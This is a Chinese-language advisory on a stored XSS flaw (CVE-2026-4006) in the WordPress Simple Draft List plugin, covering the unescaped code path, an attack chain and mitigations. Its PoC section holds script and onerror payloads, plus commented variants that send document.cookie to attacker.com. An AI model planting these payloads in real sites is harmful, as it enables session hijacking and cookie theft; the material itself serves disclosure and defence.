CVE-2026-4006 WordPress Simple Draft List插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-4006

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Simple Draft List插件

漏洞概述

WordPress的Simple Draft List插件存在一处严重的存储型跨站脚本（Stored XSS）漏洞，影响版本最高至2.6.2。该漏洞源于插件在处理文章元数据中的display_name字段时，对用户输入的过滤和转义处理不当。当WordPress文章的作者没有设置个人主页URL（user_url为空）时，插件会将未经转义的display_name值直接插入到短代码输出中。攻击者只需拥有WordPress网站的Contributor（贡献者）级别权限，即可利用此漏洞在包含[drafts]短代码的页面中注入任意JavaScript脚本。由于漏洞性质为存储型，恶意脚本会被永久保存在数据库中，所有访问受影响页面的用户都会触发该脚本执行，可能导致会话劫持、敏感信息窃取等严重后果。

技术细节

漏洞的核心问题位于插件的inc/create-lists.php文件第383行附近。插件通过`$draft_data->display_name`访问作者显示名称，由于display_name不是WP_Post对象的原生属性，PHP会触发`WP_Post::__get()`魔术方法，该方法内部调用`get_post_meta($post_id, 'display_name', true)`从数据库获取Custom Field的值。代码逻辑中存在明显的不一致处理：第378行在处理纯`{{author}}`标签时正确使用了`esc_html()`进行转义；第381行在存在user_url时也使用了`esc_html()`；唯独第383行在user_url为空的情况下，直接将`$author`变量赋值给`$author_link`而未进行任何转义处理。这个未转义的值随后通过`str_replace()`被插入到短代码的HTML输出中。攻击者只需在文章的display_name自定义字段中注入恶意脚本，如：`<img src=x onerror=alert(document.cookie)>`，即可实现持久化的XSS攻击。

攻击链分析

STEP 1

信息收集

攻击者获取WordPress站点访问权限，需要至少Contributor角色

STEP 2

漏洞探测

确认目标安装Simple Draft List插件版本≤2.6.2，且存在未设置user_url的作者

STEP 3

Payload注入

通过编辑文章或API，在display_name自定义字段中注入恶意JavaScript代码

STEP 4

触发条件

在页面或文章中插入[drafts]短代码，使用{{author+link}}模板标签

STEP 5

脚本执行

受害者访问包含该短代码的页面时，未经转义的display_name被渲染执行

STEP 6

攻击成功

攻击者获取受害者Cookie、会话令牌或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-4006 PoC - Simple Draft List Stored XSS
# Attack Vector: Inject malicious JavaScript via display_name custom field

# Step 1: Set malicious display_name in post meta
import requests

target_url = "http://target-wordpress-site.com"

# Create/update post with malicious display_name
payload = {
    'display_name': '<script>alert(document.cookie)</script>'
}

# Using WordPress REST API or meta update
# POST /wp-json/wp/v2/posts/{id}
post_id = 123
api_endpoint = f"{target_url}/wp-json/wp/v2/posts/{post_id}"

# Step 2: Create a page/post with the drafts shortcode
shortcode_content = "[drafts author_template='{{author+link}}']"

# Step 3: When users visit the page, XSS executes
# Payload in display_name is rendered without escaping in author+link

# Example malicious payload variations:
# <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>
# <svg/onload=fetch('http://attacker.com/?d='+btoa(document.cookie))>
# <body onload=document.location='https://attacker.com/cookie?c='+document.cookie>

影响范围

Simple Draft List插件 < 2.6.2

Simple Draft List插件 = 2.6.2

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：1) 临时禁用[drafts]短代码中的{{author+link}}模板标签，改用其他安全的模板变量；2) 确保所有作者都设置了user_url（虽然这不是根本解决方案）；3) 限制Contributor角色的文章编辑权限；4) 部署Web应用防火墙（WAF）规则检测和拦截恶意脚本注入；5) 考虑使用WordPress安全插件如Wordfence进行实时防护。